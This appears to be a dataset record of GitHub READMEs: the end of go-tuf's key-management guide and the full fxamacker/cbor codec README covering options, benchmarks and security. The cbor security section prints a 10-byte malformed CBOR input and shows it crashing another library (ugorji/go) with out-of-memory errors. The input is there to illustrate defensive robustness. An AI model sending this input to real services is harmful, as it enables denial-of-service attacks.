\u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n\n$ tuf timestamp\nEnter timestamp keys passphrase:\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n \u2514\u2500\u2500 timestamp.json\n\n$ tuf commit\n\n$ tree .\n.\n\u251c\u2500\u2500 keys\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u251c\u2500\u2500 repository\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 root.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 snapshot.json\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 foo\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 bar\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 baz.txt\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 targets.json\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 timestamp.json\n\u2514\u2500\u2500 staged\n```\n\n#### Adding a new root key\n\nCopy `staged/root.json` to the root box and generate a new root key on the root box:\n\n```bash\n$ tuf gen-key root\n$ tuf sign root.json\n```\n\nCopy `staged/root.json` from the root box and commit:\n\n```bash\n$ tuf commit\n```\n\n#### Rotating root key(s)\n\nCopy `staged/root.json` to the root box to do the rotation, where `abcd` is the keyid of the key that is being replaced:\n\n```bash\n$ tuf gen-key root\n$ tuf revoke-key root abcd\n$ tuf sign root.json\n```\n\nNote that `revoke-key` removes the old key from `root.json`, but the key remains in the `keys/` directory on the root box as it is needed to sign the next `root.json`. After this signing is done, the old key may be removed from `keys/`. Any number of keys may be added or revoked during this step, but ensure that at least a threshold of valid keys remain.\n\nCopy `staged/root.json` from the root box to commit:\n\n```bash\n$ tuf commit\n```\n\n## Client\n\nFor the client package, see https://godoc.org/github.com/theupdateframework/go-tuf/client.\n\nFor the client CLI, see https://github.com/theupdateframework/go-tuf/tree/master/cmd/tuf-client.\n\n## Contributing and Development\n\nFor local development, `go-tuf` requires Go version 1.18.\n\nThe [Python interoperability tests](client/python_interop/) require Python 3\n(available as `python` on the `$PATH`) and the [`python-tuf`\npackage](https://github.com/theupdateframework/python-tuf) installed (`pip\ninstall tuf`). To update the data for these tests requires Docker and make (see\ntest data [README.md](client/python_interop/testdata/README.md) for details).\n\nPlease see [CONTRIBUTING.md](docs/CONTRIBUTING.md) for contribution guidelines before making your first contribution!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "fxamacker/cbor", "link": "https://github.com/fxamacker/cbor", "tags": ["cbor", "rfc-8949", "rfc-7049", "cose", "cwt", "go", "golang", "json-alternative", "serialization", "cbor-library"], "stars": 530, "description": "CBOR codec (RFC 8949) with CBOR tags, Go struct tags (toarray, keyasint, omitempty), float64/32/16, big.Int, and fuzz tested billions of execs. ", "lang": "Go", "repo_lang": "", "readme": "# CBOR Codec in Go\n\n[![](https://github.com/fxamacker/images/raw/master/cbor/v2.5.0/fxamacker_cbor_banner.png)](#cbor-library-in-go)\n\n[![](https://github.com/fxamacker/cbor/workflows/ci/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3Aci)\n[![](https://github.com/fxamacker/cbor/workflows/cover%20%E2%89%A598%25/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3A%22cover+%E2%89%A598%25%22)\n[![](https://github.com/fxamacker/cbor/workflows/linters/badge.svg)](https://github.com/fxamacker/cbor/actions?query=workflow%3Alinters)\n[![CodeQL](https://github.com/fxamacker/cbor/actions/workflows/codeql-analysis.yml/badge.svg)](https://github.com/fxamacker/cbor/actions/workflows/codeql-analysis.yml)\n[![](https://img.shields.io/badge/fuzzing-3%2B%20billion%20execs-44c010)](#fuzzing-and-code-coverage)\n[![Go Report Card](https://goreportcard.com/badge/github.com/fxamacker/cbor)](https://goreportcard.com/report/github.com/fxamacker/cbor)\n[![](https://img.shields.io/badge/go-%3E%3D%201.12-blue)](#cbor-library-installation)\n\n[__fxamacker/cbor__](https://github.com/fxamacker/cbor) is a modern [CBOR](https://tools.ietf.org/html/rfc8949) codec in [Go](https://golang.org). It's like `encoding/json` for CBOR with time-saving features. It balances [security](https://github.com/fxamacker/cbor/#cbor-security), usability, [speed](https://github.com/fxamacker/cbor/#cbor-performance), data size, program size, and other competing factors.\n\nFeatures include CBOR tags, duplicate map key detection, float64\u219232\u219216, and Go struct tags (`toarray`, `keyasint`, `omitempty`). API is close to `encoding/json` plus predefined CBOR options like Core Deterministic Encoding, Preferred Serialization, CTAP2, etc.\n\nUsing CBOR [Preferred Serialization](https://www.rfc-editor.org/rfc/rfc8949.html#name-preferred-serialization) with Go struct tags (`toarray`, `keyasint`, `omitempty`) reduces programming effort and creates smaller encoded data size.\n\nThere are [1276 repositories](https://github.com/fxamacker/cbor/network/dependents?package_id=UGFja2FnZS0yMjcwNDY1OTQ4) that depend on fxamacker/cbor/v2. Additional 155 repositories are using version 1.x of this CBOR codec (please upgrade to v2).\n\nfxamacker/cbor is used by Arm Ltd., Berlin Institute of Health at Charit\u00e9, Chainlink, ConsenSys, Dapper Labs, Duo Labs (cisco), EdgeX Foundry, Mozilla, National Cybersecurity Agency of France (govt), Netherlands (govt), Oasis Labs, Tailscale, Taurus SA, Teleport, TIBCO, and others.\n\nMicrosoft Corporation had NCC Group conduct a security assessment (PDF) which includes portions of this library in its scope.\n\nfxamacker/cbor has 98% coverage and is fuzz tested.\n\nInstall with `go get github.com/fxamacker/cbor/v2` and `import \"github.com/fxamacker/cbor/v2\"`. \nSee [Quick Start](#quick-start) to save time.\n\n## What is CBOR?\n\n[CBOR](https://tools.ietf.org/html/rfc8949) is a concise binary data format inspired by [JSON](https://www.json.org) and [MessagePack](https://msgpack.org). CBOR is defined in [RFC 8949](https://tools.ietf.org/html/rfc8949) (December 2020) which obsoletes [RFC 7049](https://tools.ietf.org/html/rfc7049) (October 2013). \n\nCBOR is an [Internet Standard](https://en.wikipedia.org/wiki/Internet_Standard) by [IETF](https://www.ietf.org). It's used in other standards like [WebAuthn](https://en.wikipedia.org/wiki/WebAuthn) by [W3C](https://www.w3.org), [COSE (RFC 8152)](https://tools.ietf.org/html/rfc8152), [CWT (RFC 8392)](https://tools.ietf.org/html/rfc8392), [CDDL (RFC 8610)](https://datatracker.ietf.org/doc/html/rfc8610) and [more](CBOR_GOLANG.md).\n\n[Reasons for choosing CBOR](https://github.com/fxamacker/cbor/wiki/Why-CBOR) vary by project. Some projects replaced protobuf, encoding/json, encoding/gob, etc. with CBOR. For example, by replacing protobuf with CBOR in gRPC.\n\n## Why fxamacker/cbor?\n\nfxamacker/cbor balances competing factors such as speed, size, safety, usability, maintainability, and etc.\n\n- Killer features include Go struct tags like `toarray`, `keyasint`, etc. They reduce encoded data size, improve speed, and reduce programming effort. For example, `toarray` automatically translates a Go struct to/from a CBOR array.\n\n- Modern CBOR features include Core Deterministic Encoding and Preferred Encoding. Other features include CBOR tags, big.Int, float64\u219232\u219216, an API like `encoding/json`, and more.\n\n- Security features include the option to detect duplicate map keys and options to set various max limits. And it's designed to make concurrent use of CBOR options easy and free from side-effects. \n\n- To prevent crashes, it has been fuzz-tested since before release 1.0 and code coverage is kept above 98%.\n\n- For portability and safety, it avoids using `unsafe`, which makes it portable and protected by Go1's compatibility guidelines. \n\n- For performance, it uses safe optimizations. When used properly, fxamacker/cbor can be faster than CBOR codecs that rely on `unsafe`. However, speed is only one factor and should be considered together with other competing factors.\n\n## CBOR Security\n\n__fxamacker/cbor__ is secure. It rejects malformed CBOR data and has an option to detect duplicate map keys. It doesn't crash when decoding bad CBOR data. It has extensive tests, coverage-guided fuzzing, data validation, and avoids Go's `unsafe` package.\n\nDecoding 9 or 10 bytes of malformed CBOR data shouldn't exhaust memory. For example, \n`[]byte{0x9B, 0x00, 0x00, 0x42, 0xFA, 0x42, 0xFA, 0x42, 0xFA, 0x42}`\n\n| | Decode bad 10 bytes to interface{} | Decode bad 10 bytes to []byte |\n| :--- | :------------------ | :--------------- |\n| fxamacker/cbor
1.0-2.3 | 49.44 ns/op, 24 B/op, 2 allocs/op* | 51.93 ns/op, 32 B/op, 2 allocs/op* |\n| ugorji/go 1.2.6 | \u26a0\ufe0f 45021 ns/op, 262852 B/op, 7 allocs/op | \ud83d\udca5 runtime: out of memory: cannot allocate |\n| ugorji/go 1.1-1.1.7 | \ud83d\udca5 runtime: out of memory: cannot allocate | \ud83d\udca5 runtime: out of memory: cannot allocate|\n\n*Speed and memory are for latest codec version listed in the row (compiled with Go 1.17.5).\n\nfxamacker/cbor CBOR safety settings include: MaxNestedLevels, MaxArrayElements, MaxMapPairs, and IndefLength.\n\nFor more info, see:\n - [RFC 8949 Section 10 (Security Considerations)](https://tools.ietf.org/html/rfc8949#section-10) or [RFC 7049 Section 8](https://tools.ietf.org/html/rfc7049#section-8).\n - [Go warning](https://golang.org/pkg/unsafe/), \"Packages that import unsafe may be non-portable and are not protected by the Go 1 compatibility guidelines.\"\n\n## CBOR Performance\n\n__fxamacker/cbor__ is fast without sacrificing security. It can be faster than libraries relying on `unsafe` package.\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_speed_comparison.svg?sanitize=1 \"CBOR speed comparison chart\")\n\n__Click to expand:__\n\n
\n \ud83d\udc49 CBOR Program Size Comparison

\n\n__fxamacker/cbor__ produces smaller programs without sacrificing features.\n \n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_size_comparison.svg?sanitize=1 \"CBOR program size comparison chart\")\n\n

\n\n
\ud83d\udc49 fxamacker/cbor 2.3.0 (safe) vs ugorji/go 1.2.6 (unsafe)

\n\nfxamacker/cbor 2.3.0 (not using `unsafe`) is faster than ugorji/go 1.2.6 (using `unsafe`).\n\n```\nbenchstat results/bench-ugorji-go-count20.txt results/bench-fxamacker-cbor-count20.txt \nname old time/op new time/op delta\nDecodeCWTClaims-8 1.08\u00b5s \u00b1 0% 0.67\u00b5s \u00b1 0% -38.10% (p=0.000 n=16+20)\nDecodeCOSE/128-Bit_Symmetric_Key-8 715ns \u00b1 0% 501ns \u00b1 0% -29.97% (p=0.000 n=20+19)\nDecodeCOSE/256-Bit_Symmetric_Key-8 722ns \u00b1 0% 507ns \u00b1 0% -29.72% (p=0.000 n=19+18)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 1.11\u00b5s \u00b1 0% 0.83\u00b5s \u00b1 0% -25.27% (p=0.000 n=19+20)\nDecodeWebAuthn-8 880ns \u00b1 0% 727ns \u00b1 0% -17.31% (p=0.000 n=18+20)\nEncodeCWTClaims-8 785ns \u00b1 0% 388ns \u00b1 0% -50.51% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 973ns \u00b1 0% 433ns \u00b1 0% -55.45% (p=0.000 n=20+19)\nEncodeCOSE/256-Bit_Symmetric_Key-8 974ns \u00b1 0% 435ns \u00b1 0% -55.37% (p=0.000 n=20+19)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 1.14\u00b5s \u00b1 0% 0.55\u00b5s \u00b1 0% -52.10% (p=0.000 n=19+19)\nEncodeWebAuthn-8 564ns \u00b1 0% 450ns \u00b1 1% -20.18% (p=0.000 n=18+20)\n\nname old alloc/op new alloc/op delta\nDecodeCWTClaims-8 744B \u00b1 0% 160B \u00b1 0% -78.49% (p=0.000 n=20+20)\nDecodeCOSE/128-Bit_Symmetric_Key-8 792B \u00b1 0% 232B \u00b1 0% -70.71% (p=0.000 n=20+20)\nDecodeCOSE/256-Bit_Symmetric_Key-8 816B \u00b1 0% 256B \u00b1 0% -68.63% (p=0.000 n=20+20)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 905B \u00b1 0% 344B \u00b1 0% -61.99% (p=0.000 n=20+20)\nDecodeWebAuthn-8 1.56kB \u00b1 0% 0.99kB \u00b1 0% -36.41% (p=0.000 n=20+20)\nEncodeCWTClaims-8 1.35kB \u00b1 0% 0.18kB \u00b1 0% -86.98% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 1.95kB \u00b1 0% 0.22kB \u00b1 0% -88.52% (p=0.000 n=20+20)\nEncodeCOSE/256-Bit_Symmetric_Key-8 1.95kB \u00b1 0% 0.24kB \u00b1 0% -87.70% (p=0.000 n=20+20)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 1.95kB \u00b1 0% 0.32kB \u00b1 0% -83.61% (p=0.000 n=20+20)\nEncodeWebAuthn-8 1.30kB \u00b1 0% 1.09kB \u00b1 0% -16.56% (p=0.000 n=20+20)\n\nname old allocs/op new allocs/op delta\nDecodeCWTClaims-8 6.00 \u00b1 0% 6.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/128-Bit_Symmetric_Key-8 4.00 \u00b1 0% 4.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/256-Bit_Symmetric_Key-8 4.00 \u00b1 0% 4.00 \u00b1 0% ~ (all equal)\nDecodeCOSE/ECDSA_P256_256-Bit_Key-8 7.00 \u00b1 0% 7.00 \u00b1 0% ~ (all equal)\nDecodeWebAuthn-8 5.00 \u00b1 0% 5.00 \u00b1 0% ~ (all equal)\nEncodeCWTClaims-8 4.00 \u00b1 0% 2.00 \u00b1 0% -50.00% (p=0.000 n=20+20)\nEncodeCOSE/128-Bit_Symmetric_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeCOSE/256-Bit_Symmetric_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeCOSE/ECDSA_P256_256-Bit_Key-8 6.00 \u00b1 0% 2.00 \u00b1 0% -66.67% (p=0.000 n=20+20)\nEncodeWebAuthn-8 4.00 \u00b1 0% 2.00 \u00b1 0% -50.00% (p=0.000 n=20+20)\n```\n

\n\nBenchmarks used Go 1.17.5, linux_amd64, and data from [RFC 8392 Appendix A.1](https://tools.ietf.org/html/rfc8392#appendix-A.1). Default build options were used for all CBOR libraries. Library init code was put outside the benchmark loop for all libraries compared.\n\n## CBOR API\n\n__fxamacker/cbor__ is easy to use. It provides standard API and interfaces.\n\n__Standard API__. Function signatures identical to [`encoding/json`](https://golang.org/pkg/encoding/json/) include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, and `(*Decoder).Decode`.\n\n__Standard Interfaces__. Custom encoding and decoding is handled by implementing: \n`BinaryMarshaler`, `BinaryUnmarshaler`, `Marshaler`, and `Unmarshaler`.\n\n__Predefined Encoding Options__. Encoding options are easy to use and are customizable.\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\nfxamacker/cbor designed to simplify concurrency. CBOR options can be used without creating unintended runtime side-effects.\n\n## Go Struct Tags\n\n__fxamacker/cbor__ provides Go struct tags like __`toarray`__ and __`keyasint`__ to save time and reduce encoded size of data.\n\n
\n\n![alt text](https://github.com/fxamacker/images/raw/master/cbor/v2.3.0/cbor_struct_tags_api.svg?sanitize=1 \"CBOR API and Go Struct Tags\")\n\n## CBOR Features\n\n__fxamacker/cbor__ is a full-featured CBOR encoder and decoder.\n\n| | CBOR Feature | Description |\n| :--- | :--- | :--- |\n| \u2611\ufe0f | CBOR tags | API supports built-in and user-defined tags. |\n| \u2611\ufe0f | Preferred serialization | Integers encode to fewest bytes. Optional float64 \u2192 float32 \u2192 float16. |\n| \u2611\ufe0f | Map key sorting | Unsorted, length-first (Canonical CBOR), and bytewise-lexicographic (CTAP2). |\n| \u2611\ufe0f | Duplicate map keys | Always forbid for encoding and option to allow/forbid for decoding. |\n| \u2611\ufe0f | Indefinite length data | Option to allow/forbid for encoding and decoding. |\n| \u2611\ufe0f | Well-formedness | Always checked and enforced. |\n| \u2611\ufe0f | Basic validity checks | Check UTF-8 validity and optionally check duplicate map keys. |\n| \u2611\ufe0f | Security considerations | Prevent integer overflow and resource exhaustion (RFC 8949 Section 10). |\n\n## CBOR Library Installation\n\nfxamacker/cbor supports Go 1.12 and newer versions. Init the Go module, go get v2, and begin coding.\n\n```\ngo mod init github.com/my_name/my_repo\ngo get github.com/fxamacker/cbor/v2\n```\n\n```go\nimport \"github.com/fxamacker/cbor/v2\" // imports as cbor\n```\n\n## Quick Start\n\ud83d\udee1\ufe0f Use Go's `io.LimitReader` to limit size when decoding very large or indefinite size data.\n\nImport using \"/v2\" like this: `import \"github.com/fxamacker/cbor/v2\"`, and \nit will import version 2.x as package \"cbor\" (when using Go modules).\n\nFunctions with identical signatures to encoding/json include: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n__Default Mode__ \n\nIf default options are acceptable, package level functions can be used for encoding and decoding.\n\n```go\nb, err := cbor.Marshal(v) // encode v to []byte b\nerr := cbor.Unmarshal(b, &v) // decode []byte b to v\nencoder := cbor.NewEncoder(w) // create encoder with io.Writer w\ndecoder := cbor.NewDecoder(r) // create decoder with io.Reader r\n```\n\n__Modes__\n\nIf you need to use options or CBOR tags, then you'll want to create a mode.\n\n\"Mode\" means defined way of encoding or decoding -- it links the standard API to your CBOR options and CBOR tags. This way, you don't pass around options and the API remains identical to `encoding/json`.\n\nEncMode and DecMode are interfaces created from EncOptions or DecOptions structs. \nFor example, `em, err := cbor.EncOptions{...}.EncMode()` or `em, err := cbor.CanonicalEncOptions().EncMode()`.\n\nEncMode and DecMode use immutable options so their behavior won't accidentally change at runtime. Modes are reusable, safe for concurrent use, and allow fast parallelism.\n\n__Creating and Using Encoding Modes__\n\n\ud83d\udca1 Avoid using init(). For best performance, reuse EncMode and DecMode after creating them.\n\nMost apps will probably create one EncMode and DecMode before init(). There's no limit and each can use different options.\n\n```go\n// Create EncOptions using either struct literal or a function.\nopts := cbor.CanonicalEncOptions()\n\n// If needed, modify opts. For example: opts.Time = cbor.TimeUnix\n\n// Create reusable EncMode interface with immutable options, safe for concurrent use.\nem, err := opts.EncMode() \n\n// Use EncMode like encoding/json, with same function signatures.\nb, err := em.Marshal(v) // encode v to []byte b\n\nencoder := em.NewEncoder(w) // create encoder with io.Writer w\nerr := encoder.Encode(v) // encode v to io.Writer w\n```\n\nBoth `em.Marshal(v)` and `encoder.Encode(v)` use encoding options specified during creation of encoding mode `em`.\n\n__Creating Modes With CBOR Tags__\n\nA TagSet is used to specify CBOR tags.\n \n```go\nem, err := opts.EncMode() // no tags\nem, err := opts.EncModeWithTags(ts) // immutable tags\nem, err := opts.EncModeWithSharedTags(ts) // mutable shared tags\n```\n\nTagSet and all modes using it are safe for concurrent use. Equivalent API is available for DecMode.\n\n__Predefined Encoding Options__\n\n```go\nfunc CoreDetEncOptions() EncOptions {} // RFC 8949 Core Deterministic Encoding\nfunc PreferredUnsortedEncOptions() EncOptions {} // RFC 8949 Preferred Serialization\nfunc CanonicalEncOptions() EncOptions {} // RFC 7049 Canonical CBOR\nfunc CTAP2EncOptions() EncOptions {} // FIDO2 CTAP2 Canonical CBOR\n```\n\nThe empty curly braces prevent a syntax highlighting bug on GitHub, please ignore them.\n\n__Struct Tags (keyasint, toarray, omitempty)__\n\nThe `keyasint`, `toarray`, and `omitempty` struct tags make it easy to use compact CBOR message formats. Internet standards often use CBOR arrays and CBOR maps with int keys to save space.\n\nThe following sections provide more info:\n\n* [Struct Tags](#struct-tags-1)\n* [Decoding Options](#decoding-options)\n* [Encoding Options](#encoding-options)\n* [API](#api) \n* [Usage](#usage) \n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Features\n\n### Standard API\n\nMany function signatures are identical to encoding/json, including: \n`Marshal`, `Unmarshal`, `NewEncoder`, `NewDecoder`, `(*Encoder).Encode`, `(*Decoder).Decode`.\n\n`RawMessage` can be used to delay CBOR decoding or precompute CBOR encoding, like `encoding/json`.\n\nStandard interfaces allow user-defined types to have custom CBOR encoding and decoding. They include: \n`BinaryMarshaler`, `BinaryUnmarshaler`, `Marshaler`, and `Unmarshaler`.\n\n`Marshaler` and `Unmarshaler` interfaces are satisfied by `MarshalCBOR` and `UnmarshalCBOR` functions using same params and return types as Go's MarshalJSON and UnmarshalJSON.\n\n### Struct Tags\n\nSupport \"cbor\" and \"json\" keys in Go's struct tags. If both are specified for the same field, then \"cbor\" is used.\n\n* a different field name can be specified, like encoding/json.\n* `omitempty` omits (ignores) field if value is empty, like encoding/json.\n* `-` always omits (ignores) field, like encoding/json.\n* `keyasint` treats fields as elements of CBOR maps with specified int key.\n* `toarray` treats fields as elements of CBOR arrays.\n\nSee [Struct Tags](#struct-tags-1) for more info.\n\n### CBOR Tags (New in v2.1)\n\nThere are three categories of CBOR tags:\n\n* __Default built-in CBOR tags__ currently include tag numbers 0 (Standard Date/Time), 1 (Epoch Date/Time), 2 (Unsigned Bignum), 3 (Negative Bignum), 55799 (Self-Described CBOR). \n\n* __Optional built-in CBOR tags__ may be provided in the future via build flags or optional package(s) to help reduce bloat.\n\n* __User-defined CBOR tags__ are easy by using TagSet to associate tag numbers to user-defined Go types.\n\n### Preferred Serialization\n\nPreferred serialization encodes integers and floating-point values using the fewest bytes possible.\n\n* Integers are always encoded using the fewest bytes possible.\n* Floating-point values can optionally encode from float64->float32->float16 when values fit.\n\n### Compact Data Size\n\nThe combination of preferred serialization and struct tags (toarray, keyasint, omitempty) allows very compact data size.\n\n### Predefined Encoding Options\n\nEasy-to-use functions (no params) return preset EncOptions struct: \n`CanonicalEncOptions`, `CTAP2EncOptions`, `CoreDetEncOptions`, `PreferredUnsortedEncOptions`\n\n### Encoding Options\n\nIntegers always encode to the shortest form that preserves value. By default, time values are encoded without tags.\n\nEncoding of other data types and map key sort order are determined by encoder options.\n\n| EncOptions | Available Settings (defaults listed first)\n| :--- | :--- |\n| Sort | **SortNone**, SortLengthFirst, SortBytewiseLexical
Aliases: SortCanonical, SortCTAP2, SortCoreDeterministic |\n| Time | **TimeUnix**, TimeUnixMicro, TimeUnixDynamic, TimeRFC3339, TimeRFC3339Nano |\n| TimeTag | **EncTagNone**, EncTagRequired |\n| ShortestFloat | **ShortestFloatNone**, ShortestFloat16 |\n| BigIntConvert | **BigIntConvertShortest**, BigIntConvertNone |\n| InfConvert | **InfConvertFloat16**, InfConvertNone |\n| NaNConvert | **NaNConvert7e00**, NaNConvertNone, NaNConvertQuiet, NaNConvertPreserveSignal |\n| IndefLength | **IndefLengthAllowed**, IndefLengthForbidden |\n| TagsMd | **TagsAllowed**, TagsForbidden |\n\nSee [Options](#options) section for details about each setting.\n\n### Decoding Options\n\n| DecOptions | Available Settings (defaults listed first) |\n| :--- | :--- |\n| TimeTag | **DecTagIgnored**, DecTagOptional, DecTagRequired |\n| DupMapKey | **DupMapKeyQuiet**, DupMapKeyEnforcedAPF |\n| IntDec | **IntDecConvertNone**, IntDecConvertSigned |\n| IndefLength | **IndefLengthAllowed**, IndefLengthForbidden |\n| TagsMd | **TagsAllowed**, TagsForbidden |\n| ExtraReturnErrors | **ExtraDecErrorNone**, ExtraDecErrorUnknownField |\n| MaxNestedLevels | **32**, can be set to [4, 65535] |\n| MaxArrayElements | **131072**, can be set to [16, 2147483647] |\n| MaxMapPairs | **131072**, can be set to [16, 2147483647] |\n\nSee [Options](#options) section for details about each setting.\n\n### Additional Features\n\n* Decoder always checks for invalid UTF-8 string errors.\n* Decoder always decodes in-place to slices, maps, and structs.\n* Decoder tries case-sensitive first and falls back to case-insensitive field name match when decoding to structs. \n* Decoder supports decoding registered CBOR tag data to interface types. \n* Both encoder and decoder support indefinite length CBOR data ([\"streaming\"](https://tools.ietf.org/html/rfc7049#section-2.2)).\n* Both encoder and decoder correctly handles nil slice, map, pointer, and interface values.\n\n
\n\n\u2693 [Quick Start](#quick-start) \u2022 [Features](#features) \u2022 [Standards](#standards) \u2022 [API](#api) \u2022 [Options](#options) \u2022 [Usage](#usage) \u2022 [Fuzzing](#fuzzing-and-code-coverage) \u2022 [License](#license)\n\n## Standards\nThis library is a full-featured generic CBOR [(RFC 8949)](https://tools.ietf.org/html/rfc8949) encoder and decoder. Notable CBOR features include:\n\n| | CBOR Feature | Description |\n| :--- | :--- | :--- |\n| \u2611\ufe0f | CBOR tags | API supports built-in and user-defined tags. |\n| \u2611\ufe0f | Preferred serialization | Integers encode to fewest bytes. Optional float64 \u2192 float32 \u2192 float16. |\n| \u2611\ufe0f | Map key sorting | Unsorted, length-first (Canonical CBOR), and bytewise-lexicographic (CTAP2). |\n| \u2611\ufe0f | Duplicate map keys | Always forbid for encoding and option to allow/forbid for decoding. |\n| \u2611\ufe0f | Indefinite length data | Option to allow/forbid for encoding and decoding. |\n| \u2611\ufe0f | Well-formedness | Always checked and enforced. |\n| \u2611\ufe0f | Basic validity checks | Check UTF-8 validity and optionally check duplicate map keys. |\n| \u2611\ufe0f | Security considerations | Prevent integer overflow and resource exhaustion (RFC 8949 Section 10). |\n\nSee the Features section for list of [Encoding Options](#encoding-options) and [Decoding Options](#decoding-options).\n\nKnown limitations are noted in the [Limitations section](#limitations). \n\nGo nil values for slices, maps, pointers, etc. are encoded as CBOR null. Empty slices, maps, etc. are encoded as empty CBOR arrays and maps.\n\nDecoder checks for all required well-formedness errors, including all \"subkinds\" of syntax errors and too little data.\n\nAfter well-formedness is verified, basic validity errors are handled as follows:\n\n* Invalid UTF-8 string: Decoder always checks and returns invalid UTF-8 string error.\n* Duplicate keys in a map: Decoder has options to ignore or enforce rejection of duplicate map keys.\n\nWhen decoding well-formed CBOR arrays and maps, decoder saves the first error it encounters and continues with the next item. Options to handle this differently may be added in the future.\n\nBy default, decoder treats time values of floating-point NaN and Infinity as if they are CBOR Null or CBOR Undefined.\n\nSee [Options](#options) section for detailed settings or [Features](#features) section for a summary of options.\n\n__Click to expand topic:__\n\n
\n Duplicate Map Keys

\n\nThis library provides options for fast detection and rejection of duplicate map keys based on applying a Go-specific data model to CBOR's extended generic data model in order to determine duplicate vs distinct map keys. Detection relies on whether the CBOR map key would be a duplicate \"key\" when decoded and applied to the user-provided Go map or struct. \n\n`DupMapKeyQuiet` turns off detection of duplicate map keys. It tries to use a \"keep fastest\" method by choosing either \"keep first\" or \"keep last\" depending on the Go data type.\n\n`DupMapKeyEnforcedAPF` enforces detection and rejection of duplidate map keys. Decoding stops immediately and returns `DupMapKeyError` when the first duplicate key is detected. The error includes the duplicate map key and the index number. \n\nAPF suffix means \"Allow Partial Fill\" so the destination map or struct can contain some decoded values at the time of error. It is the caller's responsibility to respond to the `DupMapKeyError` by discarding the partially filled result if that's required by their protocol.\n\n

\n\n
\n Tag Validity

\n\nThis library checks tag validity for built-in tags (currently tag numbers 0, 1, 2, 3, and 55799):\n\n* Inadmissible type for tag content \n* Inadmissible value for tag content\n\nUnknown tag data items (not tag number 0, 1, 2, 3, or 55799) are handled in two ways:\n\n* When decoding into an empty interface, unknown tag data item will be decoded into `cbor.Tag` data type, which contains tag number and tag content. The tag content will be decoded into the default Go data type for the CBOR data type.\n* When decoding into other Go types, unknown tag data item is decoded into the specified Go type. If Go type is registered with a tag number, the tag number can optionally be verified.\n\nDecoder also has an option to forbid tag data items (treat any tag data item as error) which is specified by protocols such as CTAP2 Canonical CBOR. \n\nFor more information, see [decoding options](#decoding-options-1) and [tag options](#tag-options).\n\n

\n\n## Limitations\n\nIf any of these limitations prevent you from using this library, please open an issue along with a link to your project.\n\n* CBOR `Undefined` (0xf7) value decodes to Go's `nil` value. CBOR `Null` (0xf6) more closely matches Go's `nil`.\n* CBOR `simple values` that are unassigned/reserved by IANA are not fully supported until PR #370.\n* CBOR map keys with data types not supported by Go for map keys are ignored and an error is returned after continuing to decode remaining items. \n* When using io.Reader interface to read very large or indefinite length CBOR data, Go's `io.LimitReader` should be used to limit size.\n* When decoding registered CBOR tag data to interface type, decoder creates a pointer to registered Go type matching CBOR tag number. Requiring a pointer for this is a Go limitation. \n\n
